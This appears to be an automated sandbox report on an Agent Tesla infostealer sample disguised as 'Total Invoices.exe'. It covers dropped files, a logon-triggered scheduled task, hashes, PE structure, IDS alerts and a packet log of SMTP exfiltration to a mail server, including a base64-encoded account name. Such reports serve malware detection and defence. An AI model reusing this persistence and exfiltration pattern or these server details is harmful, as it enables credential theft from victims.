                                                                                      C:\Users\user\AppData\Local\Temp\tmp3C54.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.117699305067449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaExvn:cge1wYrFdOFzOzN33ODOiDdKrsuTbv
                                                                                      MD5:D224075B54516C4FC7B1D8992FBC8059
                                                                                      SHA1:9948150633F38980611B3C4BBC0B3DD1A1820944
                                                                                      SHA-256:0176438C5EE03510501D341B7F5039B7195A2A4EB155C18061308E8FE3F37E10
                                                                                      SHA-512:C12872F6DDD75955A28A14DE61F79D038D069589FAB89D87E1DA499799ECEA8CEAB0359E06FACF41F0253B46A574E93CFF45E0A09BCF07D10F0453EC3F395A51
                                                                                      Malicious:true
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                      C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.117699305067449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaExvn:cge1wYrFdOFzOzN33ODOiDdKrsuTbv
                                                                                      MD5:D224075B54516C4FC7B1D8992FBC8059
                                                                                      SHA1:9948150633F38980611B3C4BBC0B3DD1A1820944
                                                                                      SHA-256:0176438C5EE03510501D341B7F5039B7195A2A4EB155C18061308E8FE3F37E10
                                                                                      SHA-512:C12872F6DDD75955A28A14DE61F79D038D069589FAB89D87E1DA499799ECEA8CEAB0359E06FACF41F0253B46A574E93CFF45E0A09BCF07D10F0453EC3F395A51
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                      C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):45984
                                                                                      Entropy (8bit):6.16795797263964
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious, Browse
                                                                                      • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious, Browse
                                                                                      • Filename: Urgent PO 18-3081 Confirmation.exe, Detection: malicious, Browse
                                                                                      • Filename: CAHKHCM2404009CFS.exe, Detection: malicious, Browse
                                                                                      • Filename: FAR.N_2430-240009934.exe, Detection: malicious, Browse
                                                                                      • Filename: TT copy of the first payment.exe, Detection: malicious, Browse
                                                                                      • Filename: Booking_BK24-000288_19_Apr_2410_52_34 AM.exe, Detection: malicious, Browse
                                                                                      • Filename: charesworh.exe, Detection: malicious, Browse
                                                                                      • Filename: FAR.N_2430-240009934.exe, Detection: malicious, Browse
                                                                                      • Filename: FAR.N#U00b02430-24000993.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                                      C:\Users\user\AppData\Roaming\dWXyZYb.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):807936
                                                                                      Entropy (8bit):7.87057793921588
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:7ldr5ja9fm5r+jrZf1vsAJ2jN5GFhXuv:7lbjH5srZtvXouj
                                                                                      MD5:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      SHA1:43DC8CDF47186A54DC38CD86450ACA6F6361A9B4
                                                                                      SHA-256:C96565623C3E405A370614F452383A763F5A48BAF25E79F91A6311C9A0A8FD3A
                                                                                      SHA-512:5D11D8DBEC417ED7C8BD9F2B49925C01440B4D517CFF1190D411E832528550F0E6645C7005DBD0953AAFB82BA7D25977351F0AD5ABA5736BD62140A3D0CC2E6A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                                                      • Antivirus: Virustotal, Detection: 32%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9'f..............0......L.......$... ...@....@.. ....................................@.................................b$..O....@..@H..........................t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...@H...@...J..................@..@.reloc...............R..............@..B.................$......H........>..l=..........L|..(..............................................}......}......}......}.....(.......(.....*..*.0..@.........{....%o.....{....Xo......{....%o ....{....Yo!.....{....%o ....{....Yo!.....{....r...p.|....("...(#...o$.....{....o ... j.......,!..{.... X...o!......{.....X}......{....o .........,!..{.... R...o!......{.....X}......{....o%.......{....o%...(&...-@.{....o%.......{....o%...(&...- .{....o%.......{....o%...(&...+....,...*:..{....o'....*..0..........

                                                                                      C:\Users\user\AppData\Roaming\dWXyZYb.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:false
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      \Device\ConDrv

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1141
                                                                                      Entropy (8bit):4.442398121585593
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                                      Malicious:false
                                                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.87057793921588
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:Total Invoices.exe
                                                                                      File size:807'936 bytes
                                                                                      MD5:cd3c05ebb9a3fca7aa748f522559b1ea
                                                                                      SHA1:43dc8cdf47186a54dc38cd86450aca6f6361a9b4
                                                                                      SHA256:c96565623c3e405a370614f452383a763f5a48baf25e79f91a6311c9a0a8fd3a
                                                                                      SHA512:5d11d8dbec417ed7c8bd9f2b49925c01440b4d517cff1190d411e832528550f0e6645c7005dbd0953aafb82ba7d25977351f0ad5aba5736bd62140a3d0cc2e6a
                                                                                      SSDEEP:24576:7ldr5ja9fm5r+jrZf1vsAJ2jN5GFhXuv:7lbjH5srZtvXouj
                                                                                      TLSH:9905235F67E29313CAB5837AE086136203F6E189731293624FF2D6A54F12B45AF231D7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9'f..............0......L.......$... ...@....@.. ....................................@................................

                                                                                      File Icon

                                                                                      Icon Hash:d4d4d8da9a8e828a

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4a24b6
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6627390E [Tue Apr 23 04:29:02 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      dec edx
                                                                                      inc ecx
                                                                                      xor dh, byte ptr [41303547h]
                                                                                      inc edx
                                                                                      inc ecx
                                                                                      xor al, 47h
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      inc ebp
                                                                                      aaa
                                                                                      inc esi
                                                                                      cmp byte ptr [eax], bh
                                                                                      push edx
                                                                                      aaa
                                                                                      dec eax
                                                                                      inc edi
                                                                                      cmp byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa24620x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x24840.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa0b740x54.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xa04dc0xa06006bed1261e3bcd334b7d1a64848795808False0.9774652304169914OpenPGP Secret Key7.983017215615163IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xa40000x248400x24a0043a073bb7418d1841c43f729fee2f047False0.611528103668942data6.894861680909162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xca0000xc0x200b35e2cd8154a63efdbb1cdc319c41c71False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xa41f00xfe14PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9993235348379559
                                                                                      RT_ICON0xb40040x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.32948361528451436
                                                                                      RT_ICON0xc482c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.19398340248962656
                                                                                      RT_ICON0xc6dd40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.27603189493433394
                                                                                      RT_ICON0xc7e7c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.38120567375886527
                                                                                      RT_GROUP_ICON0xc82e40x4cdata0.75
                                                                                      RT_VERSION0xc83300x324data0.44029850746268656
                                                                                      RT_MANIFEST0xc86540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      04/24/24-03:17:06.326829TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49736587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:06.326829TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49736587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:06.326860TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:06.326860TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:06.326860TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249736587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49736587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:06.326860TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49735587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49736587192.168.2.4192.185.129.60
                                                                                      04/24/24-03:17:14.975638TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49736587192.168.2.4192.185.129.60

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 24, 2024 03:17:04.505109072 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:04.686703920 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:04.686803102 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:05.000096083 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.001365900 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:05.183100939 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.183913946 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:05.378051996 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.379401922 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:05.606767893 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.663089037 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.663299084 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:05.846235991 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.846681118 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:05.847342014 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.080075026 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.144768000 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.144891024 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.326119900 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.326395035 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.326828957 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.326859951 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.326879025 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.326885939 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:06.508342981 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.510248899 CEST58749735192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:06.617182970 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:13.125122070 CEST49735587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:13.349605083 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:13.530528069 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:13.530729055 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:13.774615049 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:13.774859905 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:13.956281900 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:13.956635952 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.139702082 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.139931917 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.334096909 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.334405899 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.516678095 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.516953945 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.740236998 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.770986080 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.771238089 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.960728884 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.961005926 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:14.975637913 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.975637913 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.975688934 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:14.975688934 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:17:15.161464930 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:15.163530111 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:17:15.211072922 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:18:53.470197916 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:18:53.692650080 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:18:53.854284048 CEST58749736192.185.129.60192.168.2.4
                                                                                      Apr 24, 2024 03:18:53.855979919 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:18:54.237116098 CEST49736587192.168.2.4192.185.129.60
                                                                                      Apr 24, 2024 03:18:54.418075085 CEST58749736192.185.129.60192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 24, 2024 03:17:04.224824905 CEST6433353192.168.2.41.1.1.1
                                                                                      Apr 24, 2024 03:17:04.484842062 CEST53643331.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Apr 24, 2024 03:17:04.224824905 CEST192.168.2.41.1.1.10x172cStandard query (0)mail.unitechautomations.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Apr 24, 2024 03:17:04.484842062 CEST1.1.1.1192.168.2.40x172cNo error (0)mail.unitechautomations.com192.185.129.60A (IP address)IN (0x0001)false

                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Apr 24, 2024 03:17:05.000096083 CEST58749735192.185.129.60192.168.2.4220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 06:47:04 +0530
                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                      220 and/or bulk e-mail.
                                                                                      Apr 24, 2024 03:17:05.001365900 CEST49735587192.168.2.4192.185.129.60EHLO 405464
                                                                                      Apr 24, 2024 03:17:05.183100939 CEST58749735192.185.129.60192.168.2.4250-cp-ht-2.webhostbox.net Hello 405464 [154.16.105.36]
                                                                                      250-SIZE 52428800
                                                                                      250-8BITMIME
                                                                                      250-PIPELINING
                                                                                      250-PIPECONNECT
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-STARTTLS
                                                                                      250 HELP
                                                                                      Apr 24, 2024 03:17:05.183913946 CEST49735587192.168.2.4192.185.129.60AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
                                                                                      Apr 24, 2024 03:17:05.378051996 CEST58749735192.185.129.60192.168.2.4334 UGFzc3dvcmQ6
                                                                                      Apr 24, 2024 03:17:05.663089037 CEST58749735192.185.129.60192.168.2.4235 Authentication succeeded
